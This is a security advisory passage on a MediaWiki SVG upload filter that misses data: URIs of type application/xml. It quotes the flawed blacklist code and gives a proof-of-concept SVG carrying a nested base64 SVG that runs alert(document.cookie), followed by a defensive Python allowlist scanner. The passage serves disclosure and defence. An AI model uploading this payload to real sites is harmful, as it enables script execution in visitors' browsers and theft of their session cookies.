When uploading an SVG file, it is possible to bypass the validation filters and upload an
SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and
contains protections against numerous techniques for embedding JavaScript in SVG files; however, the
protections against nested SVG files are inadequate because the MIME type blacklist is incomplete. Specifically,
data: URIs with the image/svg or text/xml MIME types are blacklisted, but the application/xml MIME
type is not, and it is sufficient to create a nested SVG file containing JavaScript code.
# /includes/upload/UploadBase.php
# href with embedded svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}
# href with embedded (text/xml) svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}
Listing 1: Blacklist filtering for data: URIs with specific MIME types.
The following example SVG file contains a nested SVG file embedded within a data: URI whose MIME type is
application/xml, which the filter in Listing 1 does not match. The nested SVG file contains executable JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <use xlink:href="data:application/xml;base64,
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5r
PSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9I
jUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTm
FtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29r
aWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC
8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/>
</svg>
Listing 2: Specially-crafted SVG file with a nested SVG file containing executable JavaScript code.
During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other
browsers do not support nested SVG files referenced in this way.
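The root cause above is a blacklist keyed on MIME type spellings, which fails the moment an unlisted spelling (application/xml) carries the same XML content. The following is an added example, written for this page and not code from the advisory or from MediaWiki's UploadBase.php: a standalone Python checker that inverts the logic into an allowlist, treating any data: URI on an href attribute whose type is not a known opaque raster format as a finding, and then decoding the URI and scanning the embedded document recursively so that a nested SVG is inspected with the same rules as the outer one. The function names, the allowlist contents, and the two sample SVG documents (one mirroring the structure of Listing 2 with a harmless handler, one benign) are constructed for this illustration.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Allowlist: the only data: URI types an uploaded SVG may reference. Every
# XML-like type (image/svg+xml, text/xml, application/xml, and any other
# spelling) is rejected by omission, which is the point of an allowlist.
ALLOWED_DATA_MIME = {"image/png", "image/jpeg", "image/gif"}

# data:<mime>[;param...],<payload>   (matched case-insensitively)
DATA_URI_RE = re.compile(
    r"^\s*data:(?P<mime>[^;,]*)(?P<params>(?:;[^,]*)?),(?P<payload>.*)$",
    re.DOTALL | re.IGNORECASE,
)


def parse_data_uri(value):
    """Return (mime, decoded_bytes) for a data: URI, or None if the value is not one.

    Whitespace inside the base64 payload (including the "base64 ," spacing and
    line breaks seen in Listing 2) and a trailing #fragment are tolerated, since
    browsers tolerate them too.
    """
    m = DATA_URI_RE.match(value)
    if not m:
        return None
    mime = m.group("mime").strip().lower() or "text/plain"
    params = m.group("params").lower()
    payload = m.group("payload").split("#", 1)[0]  # drop fragment such as "#test"
    if "base64" in params:
        try:
            data = base64.b64decode(re.sub(r"\s+", "", payload))
        except binascii.Error:
            data = b""  # undecodable payload; the caller still flags the type
    else:
        data = unquote(payload).encode("utf-8", "surrogateescape")
    return mime, data


def scan_svg(svg_bytes, depth=0, max_depth=3):
    """Return a list of findings describing scripting vectors in an SVG document.

    XML-like data: URIs are decoded and scanned recursively (up to max_depth),
    so a nested SVG gets the same checks as the document that embeds it.
    """
    if depth > max_depth:
        return [f"depth {depth}: nesting limit exceeded"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"depth {depth}: unparseable XML ({exc})"]

    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1].lower()
        if tag == "script":
            findings.append(f"depth {depth}: <script> element")
        for name, value in elem.attrib.items():
            local = name.split("}")[-1].lower()  # strip namespace, e.g. xlink:href
            if local.startswith("on"):
                findings.append(f"depth {depth}: event handler '{local}' on <{tag}>")
            if local == "href":
                parsed = parse_data_uri(value)
                if parsed is None:
                    continue  # ordinary URL or #fragment reference
                mime, data = parsed
                if mime not in ALLOWED_DATA_MIME:
                    findings.append(
                        f"depth {depth}: data: URI with disallowed type '{mime}' on <{tag}>"
                    )
                    findings.extend(scan_svg(data, depth + 1, max_depth))
    return findings


# Constructed sample mirroring the structure of Listing 2: an outer SVG whose
# <use> references an application/xml data: URI containing a second SVG with an
# event handler attribute. The handler body is a harmless placeholder.
INNER_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg"><defs>'
    '<circle id="c" r="10"><set attributeName="fill" to="#00F" begin="1s" '
    'onbegin="console.log(\'nested\')"/></circle></defs><use href="#c"/></svg>'
)
NESTED_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<use xlink:href="data:application/xml;base64 ,'
    + base64.b64encode(INNER_SVG.encode()).decode()
    + '#c"/></svg>'
).encode()

# Constructed benign sample: a raster image embedded as an allowed type.
BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<image xlink:href="data:image/png;base64,iVBORw0KGgo="/></svg>'
).encode()

if __name__ == "__main__":
    for label, doc in (("nested", NESTED_SVG), ("benign", BENIGN_SVG)):
        print(label, scan_svg(doc) or "clean")
```

Note that the checker never needs to know the spelling application/xml: the outer document is flagged because its data: URI type is not on the allowlist, and the handler inside the nested document is flagged because the decoded payload is scanned with the same rules. A production filter would combine this with the existing element and attribute checks and reject the upload on any finding rather than only reporting it.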